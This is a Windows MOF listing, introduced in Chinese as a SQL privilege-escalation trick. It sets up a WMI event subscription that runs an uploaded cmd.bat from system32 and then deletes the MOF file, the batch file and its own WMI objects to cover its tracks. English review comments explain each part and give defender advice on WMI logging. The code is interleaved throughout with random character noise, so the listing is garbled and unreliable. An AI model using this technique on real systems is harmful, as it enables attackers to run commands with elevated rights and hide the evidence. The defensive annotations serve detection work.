这个SQL提权MOF只能运行system目录下的文件,不能指定路径。
需要把要执行的命令写入bat文件并上传到system32目录,然后执行。
// NOTE(review): this listing is interleaved with extraction noise (random
// character runs between and inside lines), so it is not valid MOF as shown.
// Going by the visible tokens, it sets up a WMI event subscription in the
// root\cimv2 namespace: two event filters, two ActiveScriptEventConsumer
// instances running JScript, and two filter-to-consumer bindings.
// Defender note: the objects are created in root\cimv2, so check that WMI
// auditing (e.g. Sysmon event IDs 19/20/21, the WMI-Activity operational log)
// and any subscription enumeration cover this namespace and not only
// root\subscription -- confirm against your telemetry configuration.
#pragma
* x. S. E$ B* ^8 U namespace("\\\\.\\root\\cimv2")3 W- h* T" i- {( A
// Helper class MyClass547 with a single key property, Name. The "instfilt"
// filter further down matches creation of an instance of this class.
class3 U% b' |! F) J* ]7 J4 R6 v r
MyClass547
7 _$ |* k" t& @) I { [key]. x0 w/ j# Q" q H6 W
string
5 a( L5 E7 L8 ~ Name;
n) n7 W3 w) q* B };
// Declares ActiveScriptEventConsumer (derived from __EventConsumer) in this
// namespace, then registers a provider for it under the CLSID given below.
" y* P: U' I% c# ]/ e. G class
2 v% X9 x4 l% v9 F ActiveScriptEventConsumer
! _) g/ i' k v4 ~0 ] J, ~4 j : __EventConsumer { [key]) x3 c& e9 i3 n/ E6 A( i
string3 m$ O; s0 H Q* \
Name; [not_null]
; s9 C! w7 @8 F) O) y1 z string
' [( S$ X+ b9 Q$ i# a ScriptingEngine; string- m& ]9 X0 P; t2 t2 g
ScriptFileName; [template]1 z" M7 @. h% n7 O0 ~, _
string
( O+ @: o) d, F ScriptText; uint32 KillTimeout;
6 v/ b) o; N( @9 P Y }; instance of __Win32Provider as $P {* }' e/ G& d8 }' `$ Q& z
Name
. S4 A {6 G9 ]: J, v4 u =* k) y) n: s4 y+ g; X
"ActiveScriptEventConsumer"; CLSID =
3 C6 z% m Z2 [) z6 W "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";: P/ D5 [* i0 Z- v8 J& S
PerUserInitialization) `2 t9 g/ R4 }8 u$ V
= TRUE;
4 o9 W8 u& R2 {9 z" V$ \- m& b' S }; instance of __EventConsumerProviderRegistration { Provider7 i( d+ f H2 ]) D
= $P; ConsumerClassNames$ H6 ^8 N# A2 K i8 }
=
7 N% T7 x4 o h J0 Q5 c+ i {"ActiveScriptEventConsumer"};
# P) T9 R9 m, `$ p$ s `7 m };
// Consumer "ASEC": its JScript runs cmd.bat through Wscript.Shell with no
// path, then deletes MyClass547, the "instfilt" filter and this consumer.
// Because the script removes these objects after it runs, enumerating WMI
// afterwards will not show them; creation-time logging is what records them.
7 q6 y3 d+ M. c. O* k Instance of ActiveScriptEventConsumer7 B# o4 {& j: R& Y
as $cons { Name
# i1 ]% }/ Q; P# B% }$ ^' O8 |' | =
# E( h- b# l7 E "ASEC"; ScriptingEngine! z0 b# B: \1 f
=2 {/ u* ]! j6 Z8 }
"JScript"; ScriptText& s* a+ U% ^) s! t0 u3 B" |) }
=- b4 P2 {% o2 X* G: a
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
// Consumer "qndASEC": cleanup script. It deletes wbem\mof\good\hBsBa.mof and
// cmd.bat (both given as relative paths), then the "qndfilt" filter and this
// consumer. Since the files are deleted, file-creation auditing on those
// locations is the evidence source, not a later directory listing.
1 M' s" k, i# m, I Instance of ActiveScriptEventConsumer$ ~3 v& y- W! B$ v
as $cons2 { Name
" h! r2 z& z' x/ B4 E( Y% }( p =- H% [3 |8 Q9 r) s$ {( J" s/ |
"qndASEC"; ScriptingEngine- f9 m: u5 A$ D3 J7 b( Y
=
7 e' p, N" C5 }' `/ h) k "JScript"; ScriptText0 [) p) y+ g ~& n* h" U
= J1 a" o% @0 B) o# n
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";% P' r6 x6 S6 {4 [9 a- A0 F$ H
// Filter "instfilt": WQL query matching __InstanceCreationEvent where the
// target instance's class is MyClass547.
}; instance of __EventFilter as $Filt { Name; K1 V' w3 G6 e: y+ K7 A. D# j6 W
=: N* \5 T P4 K$ X7 [$ t
"instfilt"; Query
i, f: y+ ~% D( @$ n =
+ D) h: l* `" I "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage) u& a& R1 V7 l) i* `( ^
=
// Filter "qndfilt": WQL query with WITHIN 1 matching __InstanceDeletionEvent
// for a Win32_Process instance whose Name is cmd.bat.
1 r+ w% M3 R- e: q "WQL"; }; instance of __EventFilter as $Filt2 { Name9 R) [' ~2 | S' J2 |; ^1 d
=5 r. f5 ~9 n9 Z3 l( Z6 \+ ]( {
"qndfilt"; Query
- r- u% h) @- \/ o& \3 v =5 D' ]' i0 R+ c" e8 t
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
! @% M/ x9 ^- P% L+ f$ ]( @1 p; d =
// Bindings: $bind ties $cons to $Filt, $bind2 ties $cons2 to $Filt2.
// NOTE(review): neither script above deletes the __FilterToConsumerBinding
// instances, the __Win32Provider instance or the provider registration, so
// leftover instances of those in root\cimv2 may remain as indicators --
// verify on a test system.
6 ?" K# }7 t0 \8 f9 e8 |: f "WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
: A/ g6 p9 P( { = $cons; Filter
' q3 ~' H) o5 D1 E = $Filt;
* [4 z. Q4 t1 \3 n }; instance of __FilterToConsumerBinding as $bind2 { Consumer; h" Y; N; W! z3 r1 y% q
= $cons2; Filter
/ _$ p) b) E. l, ]8 k3 E = $Filt2;
// Final statement: creates a MyClass547 instance named "ClassConsumer",
// which is the event the "instfilt" query is written to match.
. e) t$ D0 g/ } }; instance of MyClass547+ D5 S! X2 {/ W* n$ T. Q+ ^
as $MyClass { Name4 L( D; B6 J. q) Y8 A
=% j2 z7 @8 J! F' C" }3 c
"ClassConsumer";
?# B; s( a$ q+ y8 T; X6 Q }; |